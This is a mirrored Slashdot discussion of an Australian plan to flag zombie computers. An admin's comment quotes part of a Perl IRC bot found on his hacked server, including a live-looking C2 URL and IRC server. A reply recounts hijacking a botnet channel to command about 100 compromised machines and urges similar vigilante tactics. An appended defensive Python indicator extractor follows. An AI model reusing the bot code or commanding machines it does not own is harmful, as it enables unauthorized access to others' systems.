Slashdot Mirror


AU Government To Pilot Target Zombies

msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"

4 of 159 comments

  1. dangerous by Anonymous Coward · Score: 5, Interesting

    and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

    slippery slope!

  2. I got excited for a second by illtron · Score: 5, Funny

    I got my hopes up for a second. I thought, "Finally! Those fat cats in Canberra are taking some action to prepare for the imminent impending zombie pandemic."

    My elation was premature. This is just some lame story about computers sending spam.

    Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!

    --
    Slashdot: 24 hours behind every other site or your money back!

  3. Why don't they target IRCops? by t0qer · Score: 5, Interesting

    I'm a broke geek. I host my website on a machine in my house. The last few weeks I've caught my machine being used for zombie purposes. The attack vector was a vulnerability in phpnuke.

    Let me explain "why I use that holy piece of shit".

    The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (I'm thinking vbulletin) and I've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful).

    So today the website freezes up again. Thanks to the fact that I'm dot com broke now, I basically sit here all day updating my forums, reading other forums, getting up occasionally to warm up a microwave burrito, and wait for the day Bill Gates makes all of us former Windows admins disappear to Redmond in the great Microsoft rapture of 2006.

    Ok.. SSH into the machine. Same as before, same exploit.

    poo:~# ls /tmp -al
    total 20
    drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
    drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
    drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
    drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
    drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

    Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and changed permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

    Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

    Finally I looked at bot.txt.

    # IRC
    my @adms=("bigfirex"); #nick dos administradores
    my @canais=("#testebot");
    use LWP::Simple;
    my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
    my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
    my $ircname = $dados;
    chop (my $realname = `uname -n`);
    $servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
    my $porta='6667'; #porta do servidor d irc

    Ahh, here it got interesting. I now had an IRC channel, with a room name. I tried connecting, but my machine was banned from the IRC server.

    I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex".

    I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

    I decided to ask an IRCop for help. Surely, seeing the evidence (I could have provided him shorewall and apache logs), he would take immediate action banning this guy from the network.

    I did a /who 0 and found an IRC op from IGS.ca. Below is a log of the chat I had with him.

    [msg(elsif)] hi are you an ircop?
    [elsif(jake@admin.igs.ca)] sure
    [msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
    [msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
    [elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
    [msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this network
    [elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
    [elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their

    1. Re:Why don't they target IRCops? by ivan+kk · Score: 5, Interesting

      By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

      However, it isn't their job to enforce controls that you deem necessary. We can use the example of BitTorrent trackers. The IRC server is like a BitTorrent tracker. The owner/operator of the tracker is not responsible for the torrents (in your case IRC channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

      This actually happened to me once. One of my friends' machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
      I ran strings on some of the binaries I came across, found an IRC channel, and joined it. When someone found out that I wasn't supposed to be there, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
      Turns out it was a couple of Malaysian kids, running an IRC server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
      Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an IRC server), I found out everything I needed to remove the program.
      Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The Malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the IRC server, and haven't been heard from since (however they may have simply gotten better at what they did).

      Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
      Good luck with it.
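Both posters above recovered the C2 details by reading the bot by hand (the bot.txt in comment 3, `strings` on binaries in the reply). As an added example, not code from the thread, here is a small Python parser that pulls the IRC server, port, channels, controller nicks and download URLs out of a recovered Perl bot script of that shape, so the indicators can go straight into an abuse report to the ISP or IRC operators; the sample config and every host, nick, channel and URL in it are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample shaped like the Perl bot.txt quoted in the thread;
# every host, channel, nick and URL is a placeholder, not a real indicator.
SAMPLE_BOT_CONFIG = r"""
# IRC
my @adms=("op_placeholder","second_op"); #nick dos administradores
my @canais=("#constructed-chan","#other");
use LWP::Simple;
my $dados=get("http://c2.example.invalid/nick/index.php");
my $nick=$dados;
$servidor='irc.example.invalid' unless $servidor; #servidor d irc
my $porta='6667'; #porta do servidor d irc
"""

@dataclass
class BotIndicators:
    servers: list = field(default_factory=list)
    ports: list = field(default_factory=list)
    channels: list = field(default_factory=list)
    admin_nicks: list = field(default_factory=list)
    urls: list = field(default_factory=list)

SCALAR_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([^'\"]+)['\"]")  # $name='value'
LIST_RE = re.compile(r"@(\w+)\s*=\s*\(([^)]*)\)")               # @name=(...)
QUOTED_RE = re.compile(r"['\"]([^'\"]+)['\"]")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def extract_indicators(text: str) -> BotIndicators:
    """Recover C2 indicators from a Perl IRC-bot script, keyed on variable names."""
    ind = BotIndicators()
    for raw in text.splitlines():
        # Strip trailing Perl comments. A '#' inside quotes ("#chan") has no
        # whitespace before it, so channel names survive this heuristic.
        line = re.sub(r"\s#.*$", "", raw)
        ind.urls.extend(URL_RE.findall(line))
        for name, body in LIST_RE.findall(line):
            items = QUOTED_RE.findall(body)
            chans = [i for i in items if i.startswith("#")]
            if chans:
                ind.channels.extend(chans)
            elif re.search(r"adm|master|owner", name, re.I):  # adms/admins/masters
                ind.admin_nicks.extend(items)
        for name, value in SCALAR_RE.findall(line):
            if re.search(r"serv|host", name, re.I):           # servidor/server/host
                ind.servers.append(value)
            elif "port" in name.lower() and value.isdigit() and 0 < int(value) < 65536:
                ind.ports.append(int(value))
    return ind
```

The variable-name patterns cover the Portuguese names in the quoted bot (servidor, porta, canais, adms) as well as the English equivalents; a bot that builds its nick from a downloaded page, as this one does, still leaves the download URL behind as an indicator.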